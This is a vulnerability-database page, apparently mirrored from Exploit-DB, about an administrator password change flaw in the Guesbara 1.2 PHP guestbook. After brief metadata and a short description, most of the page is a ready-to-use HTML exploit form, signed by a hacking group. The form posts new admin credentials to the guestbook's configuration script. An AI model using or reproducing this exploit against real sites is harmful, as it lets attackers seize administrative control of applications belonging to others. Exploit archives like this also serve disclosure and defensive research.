Guesbara 1.2 - Administrator Password Change

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056197 漏洞类型
发布时间 2007-03-19 更新时间 2007-03-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/29755
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/23029/info

Guesbara is prone to a vulnerability that may permit attackers to change the administrative
password.

Exploiting this issue may allow an attacker to gain administrative access to the affected application. Successful exploits will result in a complete compromise of the application. 

<html> <title>Guestbara <= 1.2 Change admin login & password exploit by Kacper</title> <table border=0 cellspacing=0 cellpadding=0 align='center'> <form method='post' action='http://127.0.0.1/guestbook_path/admin/configuration.php?action=saveconfig&zapis=ok'><tr> <tr><td width=200>Admin Email</td><td><input type='text' name='admin_mail' class='textfield' value=''></td></tr> <tr><td width=200>Admin Name</td><td><input type='text' name='login' class='textfield' value=''></td></tr> <tr><td width=200>Admin Pass</td><td><input type='password' name='pass' class='textfield' value=''></td></tr> <tr><td colspan=2 align=center> <p> <input type='submit' name='submit' value='Zachowaj'> </p> <p>by Kacper </p> <p>for</p> <p><a href="http://www.rahim.webd.pl/" target="_blank">DEVIL TEAM </a></p></td></tr> </form></table> <p> </p> <p align="center">script download: http://www.hotscripts.pl/produkt-3051.html</p> <p align="center">Greetz @ll DEVIL TEAM </p> </html>